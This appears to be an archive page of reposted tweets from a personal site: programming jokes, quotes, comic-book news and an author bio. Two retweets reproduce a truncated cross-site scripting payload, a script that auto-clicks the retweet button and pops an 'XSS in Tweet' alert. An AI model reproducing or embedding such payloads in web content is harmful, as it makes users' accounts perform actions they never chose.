RT @TheAcademy: Genie, you're free. https://t.co/WjA9QuuldD
Reposts: Reposts of content from other sites. You can subscribe to an RSS feed of this list.
RT @secretGeek: Idea: A twitter-like app where you write things to post but it doesn't post them because you're drunk. Working title: notep…
RT @ADLongwell: In software, “how long?” has two answers: 1) It's done, and 2) I don't know. Someone who answers otherwise is lying - @Mark…
RT @saladinahmed: Dante followed Virgil down, past killers and adulterers. “And here,” Virgil said “are the makers of websites that automat…
RT @JonathanLDavis: “I am Groot.” “Hodor.” “I am Groot?” “Hodor!” “I am Groot!” “hodor hodor” “I am groot.” A conversation.
RT @GeorgeTakei: This made the rounds, but not with Christopher's friends’ reactions. Child stars always have it tough. Oh bother…. http:…
RT @SwiftOnSecurity: Money is real-life sudo. “Give me that cake.” “No.” “Give me that cake I have money.” “Okay.”
RT @liz_buckley: Oooh! I'd like amusement, mistrust and devastation with my breakfast please. https://t.co/Hlyvjhkad3
RT @ConfusedCap: You know who's really going to be shocked that Marvel is turning Thor into a woman? https://t.co/Zly4ctbfYs
Yes, it’s @TripleH in a #RocketRaccoon mask. #GuardiansoftheGalaxy #CaptainAmerica #comics #Marvel #wrestling
RT @peterseibel: https://t.co/rdAEhckY4a
What a terrible superhero.
RT @dailyzen: “The problem with introspection is that it has no end.” ― Philip K. Dick
RT @A_WritersStudio: Awesome infographic – The Shapes of Stories by Kurt Vonnegut http://www.aerogrammestudio.com/2013/03/26/the-shapes-of-stories-by-kurt-vonnegut/ https://t.co/5q6qRBGWro
RT @Dani___Alves: <script class="xss”>$('.xss’).parents().eq(1).find(‘a’).eq(1).click();$('[data-action=retweet]').click();alert(‘XSS in Tw…
RT @derGeruhn: <script class="xss”>$('.xss’).parents().eq(1).find(‘a’).eq(1).click();$('[data-action=retweet]').click();alert(‘XSS in Tweet…
RT @redditflipboard: Shits about to go down [r/funny] https://imgur.com/gallery/n1svRrR?utm_source=twitterfeed&utm_medium=twitter #reddit #flipboard
RT @dailyzen: “The best thing one can do when it’s raining is to let it rain.”—Henry Wadsworth Longfellow
Cover to All new X-Men 32 By Sarah Pichelli
this is real!
have a nice weekend :-)
RT @qikipedia: The most difficult thing in the world is to know how to do a thing and to watch someone else do it wrong without comment. – …
RT @dailyzen: “Worry pretends to be necessary but serves no useful purpose.” —Eckhart Tolle
RT @WilliamAder: Panicked when I saw “Godzilla” was trending, until I found out there's a movie.
RT @GeorgeTakei: This is my stratus update. https://t.co/0PPrdTPEoL
RT @GeorgeTakei: What I see… https://t.co/FGReN70QzE
RT @iamdevloper: Fact: Deadlines contribute to 25% of the work related stress in software development. Jira accounts for the other 75%.
RT @joelmchale: #darkesttimeline
RT @dailyzen: “Many people think excitement is happiness. When you are excited you are not peaceful. True happiness is based on peace.” ―Th…
RT @nbsalert: #NBSfinds THE FOREVER WATCH: A NOVEL by David Ramirez (Hardcover - P999). https://t.co/EzGq3xPpF8
RT @WhiteHouse: The Westeros Wing. #WHCD https://t.co/wG4KbQ7BLn
RT @SeavenStudio: Ethan: Meteor Hunter is now available on PlayStation Vita! RT for a chance to get a free copy :) https://t.co/rgKPGC97Ju
RT @GonzoVice: All my life, my heart has sought a thing I cannot name.
RT @Newsarama: OFFICIAL: CAPTAIN AMERICA 3 in Theaters May 6, 2016 - Head-to-Head with Superman / Batman https://www.newsarama.com/20774-official-captain-america-3-in-theaters-may-6-2016-head-to-head-with-superman-batman.html
RT @siavash: Reading other people's code! #True #Programming https://t.co/9P6iNNXKU4
RT @dailyzen: “A good traveler has no fixed plans and is not intent on arriving” —Lao Tzu
RT @saronyitbarek: When you can't remember writing any of the code from a month ago but it's still crystal clear and you high five your pas…
RT @dailyzen: “Do not let the behavior of others destroy your inner peace.” —Dalai Lama
RT @rands: The thing is, as a nerd, it's my joy to worry. I’m good at it.
Roy Tang is a:
- programmer, engineer, scientist, critic, gamer, dreamer, and kid-at-heart
- Frustrated writer and sketch artist
- Magic player on weekends
- Software developer since 2003. If you'd like to work with me, take a look at my resume.
roytang.net is a personal site, an E/N site, and kind of a commonplace book; I post about a random assortment of topics that interest me including software development, Magic the Gathering, pop culture, gaming, and tech life. This site is perpetually under renovation.